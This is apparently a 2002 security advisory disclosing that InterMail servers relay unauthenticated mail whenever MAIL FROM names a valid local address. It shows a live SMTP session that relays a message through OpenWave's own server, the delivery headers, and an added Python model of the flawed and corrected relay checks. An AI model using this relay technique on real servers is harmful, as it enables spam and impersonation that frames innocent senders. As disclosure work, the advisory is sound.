Security Alert - InterMail

Will Relay Email for a Valid Mailbox without SMTP authentication

Author: Victoria Chan, Chief Security Officer

Date: August 14th 2002

After applying the patch that stops InterMail servers from accepting bogus mailboxes at valid domains, as exploited by the Klez virus and its work-alikes, another vulnerability remains: InterMail servers can still be exploited. All that is needed is a valid email address, and those are easily found by visiting home pages. The ramification of this vulnerability is that InterMail users could be framed for sending out SPAM. I will not go into detail on how to set up a mail client to do this, as that would be a recipe for spammers. OpenWave are the makers of InterMail; by simply visiting OpenWave's home page, I got valid email addresses.


An NSLOOKUP shows that the best MX for openwave.com is [smtp1.openwave.com]. Start an SMTP session with that server and give the valid email address in MAIL FROM; the RCPT TO can then be any address to which you want the exploited InterMail server to relay the message. To demonstrate this vulnerability, I have exploited OpenWave's own InterMail server; note that no authentication is required to relay:


Trying 206.46.164.24...
Connected to smtp1.openwave.com.
Escape character is '^]'.
220 oe-ismta1.bizmailsrvcs.net ESMTP server (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) ready Wed, 14 Aug 2002 18:10:36 -0500
HELO westernstar.kendryl.net
250 oe-ismta1.bizmailsrvcs.net
MAIL FROM: support@openwave.com
250 Sender <support@openwave.com> Ok
RCPT TO: abuse@kendryl.net
250 Recipient <abuse@kendryl.net> Ok
DATA
354 Ok Send data ending with <CRLF>.<CRLF>
Subject: InterMail Relay without SMTP Authentication
From: support@openwave.com
To: abuse@kendryl.net

InterMail Relay without SMTP Authentication
.
250 Message received: 20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net
QUIT
221 oe-ismta1.bizmailsrvcs.net ESMTP server closing connection
Connection closed by foreign host.
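The relay decision that the exchange above exercises, modelled as an added Python example (this is not InterMail's code; the local domain, trusted network and client address are constructed): the flawed rule treats a local-domain MAIL FROM as permission to relay, while the fixed rule relays only for authenticated or trusted clients, or when the recipient is local.

```python
import ipaddress

# Constructed configuration for an illustrative MTA; not InterMail's real settings.
LOCAL_DOMAINS = {"example.net"}                       # domains this server delivers for
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # internal clients allowed to relay


def _domain(addr: str) -> str:
    """Return the lower-cased domain of an envelope address such as '<user@host>'."""
    addr = addr.strip().strip("<>")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def relay_decision_flawed(mail_from: str, rcpt_to: str) -> bool:
    """Model of the behaviour the advisory describes: RCPT TO is accepted whenever
    either envelope address is in a local domain. MAIL FROM is never verified, so
    anyone who knows one valid local address can relay to any destination."""
    return _domain(mail_from) in LOCAL_DOMAINS or _domain(rcpt_to) in LOCAL_DOMAINS


def relay_decision_fixed(mail_from: str, rcpt_to: str,
                         client_ip: str, authenticated: bool) -> bool:
    """Relay only when the mail is inbound for a local domain, or the client has
    proven who it is (SMTP AUTH) or connects from a trusted network. The envelope
    sender (mail_from) is deliberately ignored: it is not a credential."""
    if _domain(rcpt_to) in LOCAL_DOMAINS:           # inbound mail: always deliver
        return True
    if authenticated:                               # SMTP AUTH succeeded
        return True
    ip = ipaddress.ip_address(client_ip)
    return any(ip in net for net in TRUSTED_NETS)   # otherwise relaying is refused


def replay_advisory_envelope() -> dict:
    """Replay the advisory's envelope (local sender, foreign recipient, unknown
    external client, no AUTH) through both decision functions."""
    mail_from, rcpt_to = "<support@example.net>", "<abuse@elsewhere.org>"
    client_ip = "203.0.113.5"                       # constructed external address
    return {
        "flawed": relay_decision_flawed(mail_from, rcpt_to),
        "fixed": relay_decision_fixed(mail_from, rcpt_to, client_ip, False),
    }


if __name__ == "__main__":
    print(replay_advisory_envelope())  # {'flawed': True, 'fixed': False}
```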



Here the vulnerability is confirmed by receipt of the relayed email:

Return-Path: <support@openwave.com>
Delivered-To: abuse@kendryl.net
Received: (qmail 42376 invoked by uid 1007); 14 Aug 2002 23:12:03 -0000
Received: from support@openwave.com by westernstar.kendryl.net
  by uid 1004 by STACKFIT (Scanned4 Virus & SPAM Keywords 0.496784); 14 Aug 2002 23:12:03 -0000
Received: from oe-mp1pub.managedmail.com (HELO oe-mp1.bizmailsrvcs.net) (206.46.164.22)
  by 820252.cipherkey.com with SMTP; 14 Aug 2002 23:12:03 -0000
Received: from oe-ismta1.bizmailsrvcs.net ([206.46.164.26])
          by oe-mp1.bizmailsrvcs.net
          (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with ESMTP
          id <20020814231201.UJUZ21795.oe-mp1.bizmailsrvcs.net@oe-ismta1.bizmailsrvcs.net>
          for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:12:01 -0500
Received: from westernstar.kendryl.net ([64.114.82.252])
          by oe-ismta1.bizmailsrvcs.net
          (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with SMTP
          id <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net>
          for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:11:08 -0500
Subject: InterMail Relay without SMTP Authentication
From: support@openwave.com
To: abuse@kendryl.net
Message-Id: <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net>
Date: Wed, 14 Aug 2002 18:12:01 -0500

InterMail Relay without SMTP Authentication


Disclaimer - This is only a security audit. The above examples are actual SMTP transactions intended to demonstrate this InterMail Vulnerability. The information herein is not intended to be used to carry out exploits on InterMail Servers.